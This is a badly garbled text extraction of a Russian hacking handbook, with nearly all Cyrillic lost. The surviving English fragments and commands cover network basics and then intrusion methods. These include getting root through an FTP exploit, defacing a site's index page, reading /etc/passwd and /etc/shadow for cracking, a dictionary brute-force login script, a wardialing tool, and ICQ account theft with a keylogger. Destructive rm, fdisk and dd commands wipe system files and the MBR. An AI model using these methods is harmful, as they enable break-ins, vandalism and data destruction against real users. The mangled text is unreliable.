638
Максим Левин Библия Хакеры, кракеры и фрикеры Методы хакмнга Теоретические основы Хакинги Internet КНИГА 1 i "-?«П t " ; -* * V Основные принципы взлома сетевых операционных систем

Библия хакера 1

Embed Size (px)

Citation preview

1i "-?

, Internet

t " -*

;

*

V

004.5 32.973.26-018.2 363

2002 . .

.

363

2. 1. - .: , 2003. - 640 . - ( ).ISBN 5-901321-79-0 , , . , , , , , . Windows NT, Linux Unix . 2 . , .

004.5 32.973.26-018.2

ISBN 5-901321-79-0

. ., 2003 .., 2003

! , - , . . . . . , , , . , . !

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt cheep if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to make us believe it is for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

Internet, HTML Telnet... ! ArpaNet... World Wide Web Internet, . WWW , , -. . , WWW Telnet, E-mail, FTP, Gopher, WAIS, Archie Usenet. . , , Web Windows PC/AT 286- . , WWW -. . WWW 30 30 000 , TCP/IP. WWW , , WWW . , . , Web, . , WWW. , , [email protected], send send , , . , , . , . ( xmodem, zmodem) .

, , . . 1990 - . . , . Web. Web 500 , , 1993 12000. Web , (URL). Web- , , , . Web (NIC) : com , , Internet. 0 edu , . net , , Network Information Center. org .

mil . gov , , whitehouse.gov. , , . , .uk, .jp .us , . Web . , Web , , Internet . Web Internet, , FTP, Gopher, WAIS Usenet. -

1993 ([email protected]). Mosaic Internet. (HTML), Web , . Mosaic Microsoft Windows, Apple Macintosh X Windows. Netscape Communications, Mosaic Netscape Navigator Gold.

HTML . () Internet HTTP . , , WWW HTML.HTML HTML . , Microsoft Internet Explorer , HTML . . , Web- , , . , , , (CGI) HTML . - . . . , . ! : . HTML .

. , . , HTML :

: , , : HTML . HTML . , . 40 . , . , :

: 0 ; ;
.

HTML . . . , , . HTML : , 1, 2, 3, 4, 5 6.

HTML . : : :

: () ( )

:

HTML : . . . . . . . .8

HTML . , . , . ! , . - , . .

HTML . , , . . , . : . > . . : Bob Bob BobAnapa.html, . , :Bob

, UNIX.

, : protocol: //hostport/path , . .

. HTML. HTML . . . , . , . ( ) , ( ).

HTML. . , . . , . - . . . . , . . . . . . . .

: . . .

10

, . . (), (&) (") HTML . HTML , escape. escape-: &lt . &gt . & . &quot .

, .

.

. :

image_URL , HTML.

, , , midi-, :

. : WIDTH midi-.

11

HEIGHT midi-. BORDER midi-. AUTOSTART midi- , HTML.

, , , , URL. IMQ :

USEMAP map_name URL. URL , map_name . : . :

URL SHAPE COORDS. SHAPE . : default . rect . circle . poly . COORDS . . . , , . , 50 50 :

12

HREF="url" , URL. NOHREF , . , HREF. .

HTML (Common Gateway Interface) Web . Web CGI . CGI CGI-BIN. , CGI-BIN . CGI-, , , . , : CGI- CGI. , , Perl. Perl . CGI . , CGI . HTML. . , FORM ACTION = /SGI-BIN/EXAMPLE.PL /FORM. ACTION ACTION URL CGI, /SGI-BIN/ EXAMPLE. PL. METHOD , . CGI. GET, HEAD POST. CGI , .

13

GET URL . , BOB.PL CGIBIN, HTML ACTION :FORM ACTION=/CGI-BIN/BOB.PL METHOD=GET

, BOB.PL, GET. CGI . , A HREF=BOB.HTML GET /BOB.HTML. GET BOB.HTML . POST CGI , Unix Windows. CGI Windows : , Web HTML, POST. : URL-Encoded. HTML. Multipart Form Data. MIME-.INPUT TYPE=TEXT

. NAME=NAME NAME. MXLENGTH=NUMBER . NUMBER .RADIO

. NAME=PRODTYPE PRODTYPE.INPUT TYPE=CHECKBOX

.ACCEPT

, . ASCII HTML. ACCEPT MIME (Multipurpose Internet Mail Extensions).

14

ACCEPT: TYPE/SUBTYPE {parameters} ACCEPT. ACCEPT.

! CGI-BIN! CGI-BIN . , Web. PERL, Web CGI ( Submit, HTML, CGI). , , , , UNIX. , Web- . ! CGI, HTML . , Web-, , . Web-. Web-, CGI . , ( , Web, CGI). ( , Perl Practical Extraction and Report Language) CGI-BIN Web. , , CGI, , , , , . ? Submit ACTION ( ), CGI-BIN. CGI-BIN . , , , .

15

Telnet Telnet, , . - Telnet , Internet. -, telnet UNIX ( , UNIX ). , . , , Internet Dial-up. , Internet , Telnet . telnet . , escape-, telnet. , . , , TCP UDP. Telnet : ; Internet, ; . Telnet NCSA Telnet. TCP/IP.

:

NSCA Telnet , Telnet, UNIX. , , UNIX, Internet Telnet. . . DOS, NCSA Telnet MS DOS. NCSA Telnet ; telnet hostname

, hostname. . NCSA Telnet VT100. . . UNIX- :newton/K set term=vt100;tset

16

NCSA Telnet , . , . . Alt-X. .

Alt-A . Alt-N . Alt-D . Alt-Z , . Alt-E DOS. Alt-G . Alt-C / . Alt-R VT100. Alt-H . Alt-Y . Alt-B . Alt-O . Alt-U . Alt- . Alt-F . . Alt-I IP- . Alt-S , Alt-P . Alt-X .

VT100 NCSA Telnet VT100. PC. .17

? ! NCSA Telnet . :telnet hostname hostname ...

hostname , .

? ! VT100 24 . 25 . . . . Alt-.

IP-. IP- . . Scroll Lock , / . PgUp PgDn. , telnet.

, . . 1. Scroll Lock. 2. . 3. . 4. Alt-C. . 5. Alt-N Alt-B. 6. Alt-V.18

.

Alt-N. . , Alt-B.

, . , , , Alt-Z.

Alt-X . , .

Alt-C, ( capfile) . Alt-C, . Parameters , . , . Alt-D.

, Alt-S. , .

VT100 VT100 ( ), Alt-R. VT100, , , , , .

! ! ! Ctrl-Shift-F3 , , Scroll Lock , ALT-R / ALT-X .

19

Ctrl-Shift-F3 Telnet DOS.

, DOS DOS , Alt-E. , NCSA Telnet, FTP format. Telnet exit. , -, , , , , Alt-P. , Parameters , F1 ( ) Esc ( ). ? , . Return. : Ctrl-U, . , Backspace. Tab . : , . Ctrl-U Backspace. . .

20

Backspace?! , Backspace Delete. Backspace. , Parameters Backspace. ! Parameters. 13 . ! VT100. : VT100 Tektronix 4014. VT100. VT100 Tektronix 4014.

, . . , Windows. bios . , BIOS.

finger finger , . :finger [parameters] [name]@hostnarae

- - finger : . . .21

. .

name . : . . . /etc/tty. . .

, .plan . , .project. finger, name , @, IP-.

finger -1 . -w finger. -t . -h config.tel.

NCSA Telnet :

FTP. .

Enabled Disabled Parameters .

22

ftp. FTP. , ftp. ftp : ftp [-name] [hostname]

-d [level] . -f filename. -g . -h . -i . - . - . - , filename. . - . -s . -V .

! [command] DOS. DOS.

account [password] FTP.

asciiASCII- .

bell .

bget . get.23

binary .

bput . put.

bye ftp.

cd .

close FTP DOS.

delete .

debug [mode] , , ->.

dir [other_directory][my_file] . . other_directory, . my_file, .

get other_file [my_file] . , , .

glob , mdelete, mget mput , . (* &) .

24

hash # , 1024 .

help [command] .

interactive .

led [directory] . , .

Us [directory] .

Is [other_directory][my_file] . other_directory, . my_file, , . , .

mdelete [other_files] olher_files .

mdir other_files my_file other_flles .

mget other_files other_files, get .

mkdir name_directory .

mis other_files my_files .

25

mode [name_mode] . . stream. more more, . UNIX. mput files files put . noninteractive . open host [port] FTP. prompt . put my_file [otherjfile] my_file . other_file, .

pwd .quit bye. quote argl arg2 ... argl arg2 ... FTP . recv other_file [my_file] get. remotehelp [name_command] FTP. rename oldjname new_name old_name .26

rm other_file delete. rmdir name_directory name_directory . send my_file [other_file] put. sendport PORT. . PORT , . slashflip . status ftp . struct [name_struct] . file. type [namejtype] ascii binary image . , , ascii. user name_user [password] [access] . FTP . - , . access, , account. verbose , FTP. . ? [command] help.27

! , Ctrl-C. , ABOR.

ftp ftp ascii binary. file, record page ( file ). stream, block compressed ( stream ).

ftp FTP . , \ /. , . , , . : , . : , . . . ( : *,$,#,-) .

FTP Alt-Z. FTP. , IP-. USER, .28

FTP NSCA Telnet FTP. : . , . . . . . FTP Parameters . FTP. , . FTP FTP . ftp IP- (% ftp 123.4.567.89), ( Enter). FTP help FTP . remotehelp FTP . ascii ASCII. binary .

cd .dir .

29

get filename -

.

put filename .

pwd .

quit FTP.

put get. . , ( put) ( get). . .

, ... ! mput mget . . , . , mget bob.* bob.l, bob.2 ..

Internet Relay ChatIRC - Usenet. , . , . . . . . . , , , . ... Internet. . , , - . , IRC .

30

Internet IRC. ! Telnet, . IRC . . . IRC . . . , . . . , . , , . . , . . . , Hi All.

IRCIRC . UNIX, ire. SLIP/PPP, . /server [server_address] . /join #newbie.

IRC

/away, .

/help .

/Invite , !

/join .

/list ( ).

/m name, , !31

/mode . , . /mode #channel +s . /mode #channel +p .

/nick . /query .

/quit IRC. /summon , ! /topic . /who !

/whois IRC. /whois * .

MUDMUD (Multiple User Dungeons). . . , -, . , - . - , .

32

MUD , , , . ? IRC? ?! , . ! IRC. . MUCK MUSE. . HoloMuck, . MUD , , MUD, . , !

exploit?Exploit , . (daemon) . exploit'oe: ftp wu-ftp2.42; wu-ftp2.60 qpopper proftp

. exploit openSource ( ), C++. , UNIX. exploit ( ) UNIX wu-ftp2.42 ( root): . tf./a.out - ( )

IP- , -offset , , () ( -5000 +5000 +100, , : -5000 -4900 -4800... 100 200... 5000). , . , , ... (patch) , (bugs) . , .

33

root?Root . Root , root (super-user), , ! root? root (, , , ). ? exploit. , - exploit. ? , C++, , , . () exploit remote access ( ), .. exploit ( , ) remote access. ? , ( ), ? 1. (, ). 2. . 3. , . , . : /etc ( ), ftpusers ( BSDI UNIX), default () root 21 (ftp) . joe ( ) root ftp. ? root #, (Ctrl+k, ). ( root): #joe /etc/ftpusers root #, Ctrl+k, a . , , ( ?). , root , root ...

34

' , ( ) , ! :#ftp ip_address or host_name login: - root password: !

! root ! ( , )... ? ! exploit! ... ...

... : login incorrect -... 1 1.000.000 ( ), , () . exploit... ( , root). : tfpasswd :New unix passwd: - ( ) 12345 : Unix password too weak, please retype password: ?

, UNIX MUST_DIE! : Abc04k9834z ? ! , - , ! , ! , () ZRHEN. 12345 : Retype password: - 12345 , ! FTP. ftp

35

ftp>open ip_address or host_name

( , - , )login: root password: 12345

! ( , ? WWW !) ftp bye:ftp>bye

. ftp, ? ! telnet ( 23), . exploit , :telnet 127.0.6.1 80

127.0.0.1 lobpback .. ip; 80 HTTP (Hyper Text Transfer Protocol) , , - :we hack you

, ( , ?). , , .. . , -! ... ? ! -? () : , apache ( web-). : which apache : /usr/sbin/apachectl

36

/usr/local/sbin/apachectl , , , , Document Root (httpd.conf). : /usr/etc/apache /usr/local/etc/apache ( ) apache DocumentRott (home_dir) :/WWW

/home/www /usr/local/www:#cd home_dir

home_dir www. index.htm index.html. ? : #ls -full | more (www). : #rm index.htm (index.html) . : tfjoe index.htm (index.html) ( joe) - :This site hacked by Vasya

Ctrl+k, . joe .

37

,

, , . , , . , , Internet, , . .

? , Internet. 1960 . . . , , . .

?, , . . , .

? , , , . . , : Net 1. Netl Net2. Net2 Net3.

- .

38

, , . , , . ! . . . ? . ! . . , , . , . .

, :

, , . , , . .

. .

, .

? , Internet. , , , . ,

39

, . , -, , , . ? ? ? , . , - , -. , . , Internet ? , Internet, . Yahoo crack...

. ... : ( , , , , , , ), (, , , ), (, , , , , ), ( ). . , , : , . . . , . , , . .

40

, , . . . - . . . . . , , . . , . .

, . , , , . , (, TCP/IP). . ? ! . ...

41

, : Linux RedHat UNIX SlackWare UNIX FreeBSD , UNIX

: Linux BSD (FreeBSD, OpenBSD, NetBSD...)? . . ... , : ftp 21

telnet 23 smtp 25 http 80 110

. , :FTP (21)

, FTP, , . FTP? File Transfer Protocol ( ). , FTP , 21 , , . TELNET (23) , ( ), . telnet ? , (!) ( !) .

42

, SMTP (25)

, , ? , . Simple Mai] Transfer Protocol .HTTP (80)

Hyper Text Transfer Protocol . , , , - Internet. web-, ( ) . , . , ! , web- .(110)

MailAgent (, Microsoft Outlook). () . ? , ... UNIX . ( ) UNIX.

Windows ( MUST_DIE), (, , , D...) : C:\MUST_DIE\die.cora UNIX /, ( CDROM) (, /cdrom). . . . /etc. () /etc passwd .. /etc/passwd. , , , , . , !43

, , IP-. :tracert ( UNIX traceroute) w3.cnn.com - ...

( ) IP- (IP Internet. 195.55.55.55 ( 0...255 .. 0-255.0-255.0-255.0-255). ftp ( IP-). ? MS-DOS PROMPT MS-DOS. ( ) login. Internet. Password. Internet. - ( , , ! w3.dos.net IIS (Internet Information Server), ! . :Directory ///_ not found Logging in "/"

, , . :ftp> ( ) get /etc/passwd

. ? . , find MUST_DIE passwd ( ). , ftp (.. MUST_ DIE). , find. , . , , , ! , ! ... : , .

44

,

? IP . , , . , . : ? , Internet. TCP/IP (Transfer Control Protocol/Internet Protocol) , Internet. . Internet, IP- (, pppl03-3-5.diaIup.glasnet.ru). ( ) , . , , IP:port ( , 195.34.34.30:21 , FTP zone.ru). , , - 23 ( telnet) ( telnet ip:port. , 23 ). , . /, . , , , . 23 , - , . . ( ). 273-275 , ... , , , ... : , Internet. , . . , - . ( 19). , -

45

, , . , . (Finger). finger , , , . , ? 1 1024 (well-known). , services. Windows C:\TBOu_Windows\SERVICES\. NT C:\W1NNT\ SYSTEM32\DRIVERS\ETC\SERVICES. /etc/services/ ( , ). , (WWW, e-mail, FTP, news, telnet). , SMTP 25 , , WWW 80 , FTP 21... , , . ! , ( ) , . , , - , ( , Internet !). . - . , ? - , - . . , ... sendmail ( wiz debug FTP-, ). , , - .

46

, Windows . , Internet. , . . , , . . , ++, (root) , !!! FTP-Bounce , , FTP ( / / ) , . ( ). , FTP , . ( ). , ( --- !). , ( !), . , : NT, VMS UNIX. UNIX BSD, AIX, SCI, Sun OS, Irix () . , , NT, UNIX, Sun OS (, ). , , , - . . , ? , netstat - ( > ) - : Active Connections Proto Local Address Foreign Address State TCP localhost:1027 0,0.0.0:0 LISTENING

47

, TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP UDPlocalhost:135 localhost:135 localhost:1026 localhost:1026 localhost:1027 localhost:137 localhost:138 localhost:nbsession localhost:135 localhost:nbname localhost:nbdatagram 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 localhost:1027 localhost:1026 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 *:* *:* *:* LISTENING LISTENING LISTENING ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING

XMMM. . . ,

. , Local Address ( ) 135, 137, 138 nbsession ( 139 ... netstat -an, , . Microsoft Networking LAN ( ). Internet , www.uxx.com, , www.happyhacker.org. - ( www.whitehouse.gov). netstat - : Active ConnectionsProto TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP Local Address localhost: 1027 localhost: 135 localhost: 135 localhost:2508 localhost:2509 localhost:2510 localhost:2511 localhost:2514 localhost:1026 localhost:1026 localhost:1027 localhost:137 localhost:138 localhost:139 localhost:2508 localhost:2509 localhost:2510 localhost: 2511 localhost:2514 Foreign Address State 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING localhost:1027 ESTABLISHED localhost:1026 ESTABLISHED 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING zlliks.505.0RG:80 ESTABLISHED zlliks.505.0RG:80 ESTABLISHED zlliks.505.0RG:80 ESTABLISHED zlliks.505.0RG:80 ESTABLISHED whitehouse.gov: telnet ESTABLISHED

48

, , . , , 4 zIlinks.505.ORG 80 whitehouse.gov . , Internet. www.happyhacker.org (zlliks.505.ORG). , 1024??? , , , . -, - , 1024 . ? , 2508 2511. ? Internet () netstat -r. - : Route Table Active Routes:Network Address Netmask Gateway Address Interface Metric 0.0.0.0 0.0.0.0 198.59.999.200 198.59.999.200 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 198.59.999.0 255.255.255.0 198.59.999.200 198.59.999.200 1 198.59.999.200 255.255.255.255 127.0.0.1 127.0.0.1 1 198.59.999.255 255.255.255.255 198.59.999.200 198.59.999.200 1 224.0.0.0 224.0.0.0 198.59.999.200 198.59.999.200 1 255.255.255.255 255.255.255.255 198.59.999.200 0.0.0.0 1 Active Connections Proto Local Address Foreign Address State TCP lovely-lady:1093 mack.foo66.com:smtp ESTABLISHED

Gateway Address Interface IP ( IP , ). , , 10 , , , ( ) , ( ). - , Internet . -: . ? . . e-mail UUPC . 49

, online offline . init initl \UUPC. login password. . , . user' , login:. . , Netscape, SLIP & , , , . , - . transmit . , , Windows. , ... : .pwl. Windows . . , DES. . , .pwl , 1,2,3,4 , , . , . , . . -. , . BBS, . ! 100%. login, password. , . , . - ( ) . . login/passwd, . root . - . , , . UNIX: FreeBSD, BSDI, SCO open server, Linux. , , NexStep, UnixWare, Solaris, Aix, HP-UX, VAX-ORX5.12. , Xenix. ,

50

, , AT&T UNIX 1971 . UNIX: ; ; su, newgrp, at, prwarn, sadc, pt_chmod; .

UNIX , , / . UNIX /etc/passwd. , . login/passwd root. . / login'aMH? . , . , login . . #@4OFIU'0346'e. jack, crackerjack, blob . . passwd, , , , . passwd Linux 2.1.3 blob , 20 . , , UNIX SCO Open Server 5 . , SCO 3 1,2,3 3 , 4,5 - , 6 .

. , , , . , , . . , . . , . . .

. , ! , . , 51

, . , , , . . , . , : 1. . 2. , , . , . , . , , . , . , . , . . , .

, ( , , , ). , , , : , , . : , , , , .

, , . , , . . , . , , .

52

, , , . , . , . , , , , , , - . . . . , , , , -, . , ( , ).

, - ,

, , . , , , . , , , . , . , TECHRIME-USA BBS , , ! , , . , , . , . : 1. , , , 2. , . , , , .

53

, , - . , . , . - , , . , . . , , . , . ? . - - , , . , , , ! , , , . , , . , , - , . . , , . , . , , , . , , , ^ , , . , , , . . , , , , , . , , . . ; , , . , , . , .

54

, , , . COSMOS ( ). , . , . , . . , , , . , , . , , . , , . . . . . ? -. , , , , , . , , , , , , . . , . , , , . . . , , .

, , . , , , , ,55

, , , . 1 . , . , (private branch exchange) , , , . , , . , , . , , . , , - , . , , , , . , ( , !) ( ). , , , , , . , . . , . , , . . , , ( ), , , . , , .

, : , . . : , . , , . , , , ,56

, . . , .

, . , , . , , , . , , , 3 5 . . , , . . , , . , , , , . , BBS Pretty Theft ( ) -, . BBS , , , . , . ( , , ): GFH-NET! 300-2400 (123)45&-7890 GREENWOOD FAMILY HOSPITAL GFH-NET . , , !!! ?

: ? , , , "RETURN" :

, , . , . : , , ? ! , , . , 57

, ? , , . , - ; RETURN, . . . , . : . ? , , ? - ? -... , ... , - ... ? . , . ( , , .) ? . . , . . , GFH-NET . . , , , - , . GFH-NET, , . , .. BBS. , , - . - ; . , . , . . , , . BBS , , , , : ! . !

! . , -, , . -

58

, , , , . ( .) , , . : , , . , , , , , - . , , , ? . * , , . , , . , , . , , . , , , , ... , , . , : - -.

, . , , - , . , , , , . , ! , . . - . , , , . , . GFH-NET. , : , - . , ? . , ( .) , , . , , , 59

, - -, -. , , , F . , , . , , , . : , , BBS . : . : , ! .. . .

, , . - . , , , . GFH-NET , , , , . BBS , , , - , . , - , , , , , . , , , , , . , , , ( , ), , . . , , , , - , , . , , , - . , . 60

, , .

BBS BBS : - . , BBS . BBS, , , . , BBS, . . , , , . , . . , BBS . , BBS, , : , , , . , BBS . BBS , . BBS , BBS, , , - . BBS , , . BBS, , , , , , . BBS , DEATH () PASSWORD (). , , , , . 61

, BBS , , , , . , , BBS . , , BBS, . . , . , BBS, . , ? , , . , , , BBS, , , , , . , - BBS, , , . ( , , BBS , .) , . , , BBS, , . , , . , , BBS, , , . 1986 BBS , The Board ( , ..). 2000, ( , ) , 20- : "" BBS (1-) ! ( - BOARDSCAN) 66 300, 1200 24 . (3) - . 313--

62

, , , : : BBS : 41 : ! 11 : : : 8,20,86 @ 12.08

:

THE BOARD, "" BBS, WDIV-TV. :

, " ". .

, , , , ,

. , , , - - . ? News 4. THE BOARD, , 12 48 . , ID. Boardscan

2000, " ". , , BBS , , . ?

" ' , . . . . - . , WDIV, Detroit, Ml. : BBS : 42 : BOARDSCAN : : : 8,20,86 3.31

63

, Boardscan (1). ! WDIV, Detroit. . ( Cable Pair)

- ? , , , , . , kOOl, (The Reaper) Cable Pair. , , HEL-N555,Elite,3 , . , . , . , , . , . , BBS. BBS . . BBS ... , : . , ? , BBS , . , , , BBS, , . . BBS , . , , , : BBS ; , , , , BBS - , . BBS , , , , . , . 64

, , , 180 . , , , BBS. , ( 180 ), . , , , , , , . , , , BBS. , , BBS , , , . , . BBS, . .

, - , , , , , . , , . , , . , , - , . , , . . , , , , , . : ,

65

, , . , , . , . . , , . , . , , , , , 123-45-6780 12345-6789, . , . , , . , .

(Log-) . , , , , , . : ! . ... ... , . , , , ( , , ). , . . , , , - , . , , , , , . , , -

66

, . , . , , , , , . , , , . , , .

! , , , , . , , . , , . , , . , , . , , . , , , . - , , , . Control-C - , . , . , , , . , , , , . . , ? - . . , . , , , , . ,

67

, , , . , , . , , , . : , . , . , , . , , . , . .

, , , . , . , . , . , . , ; , - , , - , . , , . , . , . , . , . , , . . , Break , , - -. .

68

, . , - , .

: , , - ? , , . , , , . : , , , . Wipefile. . , , , - . , - . , , , , . , : , , , BBS . . , , . , , . , , , : - . , , . , , . , , . , . , , , ; . , , !

69

,

, , , , , , , .. , , , , , , . . , , , , , , , . , , - , . , - . , . , , . , , , , . , , . , , , . , , , . , , , . (, , , , !) , , , . , , . , . , , , , , . . , , . 70

, , . , , , . . , - . - . . , . , , . , . , . , . , . . . ! !

, , , . , : 1. . 2. . 3. . 4. . 5. . , , . . , . - . , . . , , , , , . , , . , , . , , , . , -

71

, , . - . . , . . , , ; , , . , , . , , . , 1974 , , . , , , . , , , . , , . . 5 , , , , , , . , . , . , , , . , , . . . , , , . , , . . !

... , - -. , (, ) , setup, , . , -

72

, , - install maker. Vise Installer ( ), , , ... , , , , ( ). ( - ) Vise (www.mindvision.com , ). , , , , . ! - , Screens. , ( screen add screen). . ? , , . , , , - . action ( , , ..). . add\delete action , ... . , Windows, autoexec.bat (config.sys, msdos.sys, io.sys...). win.ini . copy action. registry ( , Register file type, , Dont ask user to replace if already registred, ...). , ' *.txt *.wav - ! , . , , DirectX 2.0 www.ob.da.ru.

73

, , Ct)-ROM. , , Uninstaller', regestry, ... ? ? , , - ? , , , .

. . , setup , AVP , , . , , ? . !

, : . , , . ! . . - - , . : . - ( , ) , . , , . . ( , !), : , . - , ( ). ( Internet Explorer Netscape Navigator) : window.resizeTo (x,y) window.moveTo (x,y), . ( ), , . , , , .

74

, , : 1: Xenix // script function move_the_window(){ // window.resizeTo(screen. width/2, screen, height/2);// window.moveTo(1,1); //

var x=1; // -. var y=1; // Y-. var dx=7; // X var dy=10; // ... Y move(); // , function move(){ // . while(true){ // if(x>=(screen.width) || x=(screen.height) | y JavaScript is cool!

, move_the_window. . screen.width screen.height ( ) , , , .

75

, move. , . task manager ( ). , , , while while(var i < ) i++. resizeTo . , , , : 2: // script function move_the_windows(){ // window. resizeTo(screen.width, 25); // 1 window.moveTo(0,1); // window2 = ("", null); // window2.document.write(" Window N2"); // window2.resizeTo(screen.width,25); // window2.moveTo(0, screen.height-25); // var dy1=2; // var dy2=-2; // ... var y1 = 1; // Y- var y2 = screen.height-25; // Y- move(); // , function move(){ // while(true){ // if (y1>=(screen.height) || y1 =(screen.height) | y2 ) send(fh65) :2

wait4string(1,"M,5,goto(tstart),ocal>) send(connect 189.25.56.7) :3 if string'sconnected then goto(2) if string'ncorrect then goto(3) wait4string(1,"C,5,goto(4),ogin:) send(root) if string'sconnected then goto(2) if string'ncorrect then goto(3) :4 if string'sconnected then goto(2) if string'ncorrect then goto(3) wait4string(1,~D,5,goto(4),assword:) send_next_dic(1) if string'sconnected then goto(2) if string'ncorrect then goto(3) :5 if string'sconnected then goto(2) if string'ncorrect then goto(3) :6 wait(1) if string'sconnected then goto(2) if string'ncorrect then goto(3) waitd) if string'sconnected then goto(2) if string'ncorrect then goto(3) wait(1)if string'sconnected then goto(2) if string'ncorrect then goto(3) wait(1>124

if string~sconnected then goto(2) if string~ncorrect then goto(3) wait(1) if string*~sconnected then goto(2) if string'ncorrect then goto(3) wait(1) if string'sconnected then goto(2) if string'ncorrect then goto(3) waitd) if string'sconnected then goto(2) if string'ncorrect then goto(3) waitd) if string'sconnected then goto(2) if string'ncorrect then goto(3) wait(1) if string'sconnected then goto(2) if string'nco-rrect then goto(3) :7 beep beep beep beep beep beep beep beep beep log() log() log() Log( HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!!) log() log( TaRGeT: $PHONE_NR Dale: $DATE TiMe: $TIME) log() logO logO log( ACCouNT: root) log( PaSSWoRD: DIC(1)) logO logO logO END

125

Network User Address Attacker. //. NUA Attacker Turbo 2.0 . Network User Address Attacker SprintNet. SprintNet . logfile . Net ? . , SN D390.TXT . , , , , . UNIX. , // , , .

NUAA.EXE

NUA Attacker.NUAA.DOC

.README.PHA

!SND390.TXT

Net.NUAA.CFG

.NUAFILE.PHA

.LOGFILE.

, , NUA, .

126

NUAfile Logfile . NUAFILE.PHA LOGFJLE.PHA , . , , , EOF.

NUA Attacker : :\ >NUAA [/I] /I . , Begin attack ( ), NUA Attacker ( , Net @).

Setup attack. . Phone Number Net (SND390.TXT). Starting NUA . Ending NUA . Timeout . Log filename , . NUA filename , ( NUAFILE.PHA). Decimals . Net : XXXXXX.XX.NUA Attacker .

127

, :Starting NUA: 619100.10 Ending NUA; 619200.10

619100.10, 619100.11, 619100.12 . : ESC Setup attack . ALT-S

. , , File commands Save options. . . , :Starting NUA: 6191 *WRONG* Ending NUA: 619100 RIGHT*

, 6191 6199 6200. : Ending NUA: 619100 *RIGHT* .Starting NUA: 619001 RIGHT*

Modem parameters. COM Port

, . Baud Rate

(, 9600). Initialization

. Hayes- . Dial Prefix

.128

Dial Suffix

, . . Hangup . Begin attack. : 1. . 2. Net. , Setup attack. 3. TERMINAL= D1. D1 , . 4. @. 5. . Starting NUA Setup attack. , , NUA Attacker . :ALT-B

Net , .ALT-H

.. Pause.ALT-X

.ESC

. :Starting NUA

, .Ending NUA

.

129

Connections , . Current NUA , .Log

Logfile.NUA

NUAfile. Time/Elapsed . Status / . Last / . Setup attack Bad Pad. Y, , 10 , @ TERMINAL=. ( Net). . . , , Y.

! UNIX , . , Internet: Ftpd (ftp daemon) port 21 Telnetd (telnet daemon) port 23 Smtpd (smtp daemon) port 25 Httpd (http daemon) port 80 Pop3d ( daemon) port 110

. ( root'a) :

130

killall httpd web- ' . killall ftpd ftp- . , : ( root'a):tfhttpd start ( Linux) tfapachectl restart ( FreeBSD web apache)

ftpd:ftpd ( !)

. . , ( root'a): #cd /#rm * ( (!) ) #cd /boot #rm * #cd /bin #rra * #cd /sbin #rm * #cd /usr/bin #rm * #cd /usr/sbin #rm *

, ... ( /etc, ). , .. rm : /bin

/sbin /usr/bin /usr/sbin

, ( rm ). :which rm

, rm. .131

? #cd #rm : /etc * !

: reboot ( ) ... , 100% ... ? ( root'a): tffdisk ( . (, 4), : d (enter), 4 (enter) d (enter), 3 (enter) d (enter), 2 (enter) d (enter), 1 (enter) w Enter. ! ! ( !) UNIX dd, ( ). , . SlackWare: :hdal - slack ; hda2 - dos ; hdc2 - slack

( , DOS, , MBR (Master Boot Record) hdc2 (SlackWare). UNIX ? ! ...): dd /dev/hda /dev/hdc 0 512 -: 512 . 512 ? Master Boot Record (MBR). ... ... 512 ( )... ???

132

dd () hda hdc! hdc! , - ... Ctrl+C, dd. ... dd 20 ... ... 8 , Internet 2- ... : dd fdisk. , ( ).

99% (), ( ) ! ( ... ( ) . () ( portscanner):portscanner 55.55.55.55 1 1024

55.55.55.55 IP- ; 1 ; 1024 . ( n- ) ( ):21 22 25 80 110

:telnet telnet telnet telnet telnet HOST_IP HOST_IP HOST_IP HOST_IP HOST_IP 21 22 23 80 110

, .133

exploit ... ? : 1. ; 2. IP-; 3. , , ; 4. exploit.

( ) CGI. CGI? Common Gateway Interface. CGI , html mime-types ( gif). , , , , .. , CGI... CGI, Perl: #!/usr/bin/perl print "Content-type: text/html\n\n"; print "Hello!\n"; ( ) : Hello! . , ( ). , : 1. Count.cgi ; Count.dat .

2. : (, ): Count.cgi 755. .. flchmod Count.cgi 755 Count.cgi 777. .. tfchmod count.dat 777

134

telnet , ftp , ftp, chmod ftp. count.cgi: #!/usr/bin/perl print "Content-type: text/html\n\n"; open (file,"count.dat);

@dat=; close (file);

$dat[0]++; open (file,">count.dat"); print "$dat[0]\n";

close (file);

print " $dat[0]\n";

count.dat ( 5). ! , count.cgi 1. CGI ... ( ) .. CGI ! - ( , .. , ), : . ... ( , ...) ( e-mail -). e-mail :cat /etc/passwd

cat /etc/master.passwd cat /etc/shadow

( ). , , .

135

- :Root:fdkjhgSFDgf:

... ( John the ripper') . : .

- , . ? , () () . , , , , . , () , () . ? () .core. ? , , , , . -, real-networks ( real-audio/real-video ). , ...

' Bugs, Crack Social Ingineering : , UIN , , . , . : Internet , . . :\ . ICQ. UINoB 20 SOxxxxx. C:\Program Files\136

ICQ\UIN number.uin , , e-mail . , keyboard sniffer , . ICQ Low, Medium High. . , , ICQ. ( , ). UINy , , , reboot, , ICQ , keyboard sniffer . . , - : , sniffer .

, ? , - ? , , UIN http://www.icq.com/password/ ICQ e-mail . UINy e-mail. . , Password Crack . , . , hotmail.com , e-mail , . : ICQ 777777. UIN! e-mail, [email protected]. UINa , 2 137

